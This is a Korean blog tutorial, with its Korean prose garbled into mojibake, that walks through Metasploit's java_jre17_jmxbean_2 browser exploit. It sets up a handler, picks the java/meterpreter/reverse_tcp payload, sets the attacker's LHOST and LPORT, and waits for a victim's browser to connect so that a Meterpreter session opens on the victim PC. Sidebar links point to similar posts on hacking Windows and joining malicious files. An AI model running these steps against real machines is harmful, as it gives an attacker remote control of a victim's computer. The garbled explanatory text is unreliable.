๋ชจ๋ ์ฑ
์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค.
๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์
service apache2 start
service postgresql start
service metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค.
๊ทธ ํ msfconsole์ ํด์ค๋ค.
๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.)
๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.
use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค.
์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค.
๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง ์์ผ๋ฉด ๋๋ค๊ฐ์ผ๋ก ๋ง๋ค์ด ์ค๋ค.
๋ค์์ผ๋ก๋ payload๋ฅผ ์ค์ ํ๊ธฐ์ํด show payloads ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ payload ๊ฐ ๋ฌด์์ด์๋์ง ํ์ธ์ ํ๋ค.
์ฐ๋ฆฌ๊ฐ ์ฌ์ฉํ payload๋ java/meterpreter/reverse_tcp ๋ผ๋ payload ๋ฅผ ์ด์ฉํ ๊ฒ์ด๋ค.
payload ๋ํ ์ค์ ํ์ผ๋ ๋ค์ show options์ ์ด์ฉํ์ฌ ๋ค์ ์ค์ ํ ๊ฒ์ ๋ณด์
set LHOST attacker IP ์ set LPORT ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํต์ ํ ํฌํธ๋ฅผ ์ง์ ํด์ค๋ค.
๋ค์์ exploit -j ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ๋ค.
๊ทธ ํ victim PC์์ ์ธํฐ๋ท๋ธ๋ผ์ฐ์ ์์ ๊ณต๊ฒฉ์๊ฐ ์ง์ ํ IP๋ก ์ ์์ ํ๊ฒ ๋๋ค๋ฉด
attacker PC์์๋ victim ์ปดํจํฐ์ session ์ ํ์ธ ํ ์์๋ค.
๊ทธ๋ผ session -i ID[session ID]๋ฅผ ์ ๋ ฅํ๋ฉด meterpreter๊ฐ ๊ฐ๋ฅํ๋ค.
'Metasploit' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
Hack windows XP with armitage in kali (0) | 2016.12.23 |
---|---|
Kali Linux by pass - Hack Windows metasploit tutorial (0) | 2016.12.22 |
Heartbleed :) ํํธ๋ธ๋ฆฌ๋ (0) | 2016.12.21 |
์์ฆ ์ ํ ํ๋ ๋ชธ์บ (๊ธฐ์ด๋ฐฉ์) (0) | 2016.12.15 |
ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) (0) | 2016.05.24 |
๋๊ธ